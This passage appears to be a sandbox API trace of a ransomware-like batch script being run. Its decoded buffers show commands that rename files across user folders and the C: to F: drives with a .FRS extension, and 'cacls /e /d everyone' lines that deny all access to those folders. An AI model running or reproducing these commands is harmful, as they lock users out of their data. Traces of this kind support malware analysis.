lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0075.901] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0075.901] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.901] GetFileType (hFile=0x34c) returned 0x1 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0075.901] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0075.901] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0075.901] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.901] GetFileType (hFile=0x34c) returned 0x1 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0075.901] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0075.901] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0075.901] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.901] GetFileType (hFile=0x34c) returned 0x1 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0075.901] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0075.902] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0075.902] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.902] GetFileType (hFile=0x34c) returned 0x1 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0075.902] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0075.902] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0075.902] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.902] GetFileType (hFile=0x34c) returned 0x1 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0075.902] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0075.902] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0075.902] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.902] GetFileType (hFile=0x34c) returned 0x1 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0075.902] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0075.902] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0075.902] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.902] GetFileType (hFile=0x34c) returned 0x1 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0075.902] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.902] SetFilePointer (in: hFile=0x34c, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0075.902] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0075.903] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.903] GetFileType (hFile=0x34c) returned 0x1 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0075.903] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0075.903] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0075.903] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.903] GetFileType (hFile=0x34c) returned 0x1 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0075.903] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0075.903] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0075.903] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.903] GetFileType (hFile=0x34c) returned 0x1 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0075.903] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0075.903] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0075.903] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.903] GetFileType (hFile=0x34c) returned 0x1 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0075.903] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0075.903] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0075.903] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0075.903] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.903] GetFileType (hFile=0x34c) returned 0x1 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0075.904] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0075.904] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0075.904] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.904] GetFileType (hFile=0x34c) returned 0x1 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0075.904] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0075.904] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0075.904] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.904] GetFileType (hFile=0x34c) returned 0x1 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0075.904] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0075.904] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0075.904] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.904] GetFileType (hFile=0x34c) returned 0x1 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0075.904] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0075.904] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0075.904] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.904] GetFileType (hFile=0x34c) returned 0x1 [0075.904] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0075.904] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0075.905] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0075.905] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.905] GetFileType (hFile=0x34c) returned 0x1 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0075.905] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0075.905] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0075.905] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.905] GetFileType (hFile=0x34c) returned 0x1 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0075.905] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0075.905] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0075.905] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.905] GetFileType (hFile=0x34c) returned 0x1 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0075.905] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0075.905] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0075.905] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.905] GetFileType (hFile=0x34c) returned 0x1 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0075.905] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.905] SetFilePointer (in: hFile=0x34c, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0075.905] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0075.906] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.906] GetFileType (hFile=0x34c) returned 0x1 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0075.906] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0075.906] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0075.906] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.906] GetFileType (hFile=0x34c) returned 0x1 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0075.906] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0075.906] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0075.906] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.906] GetFileType (hFile=0x34c) returned 0x1 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0075.906] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 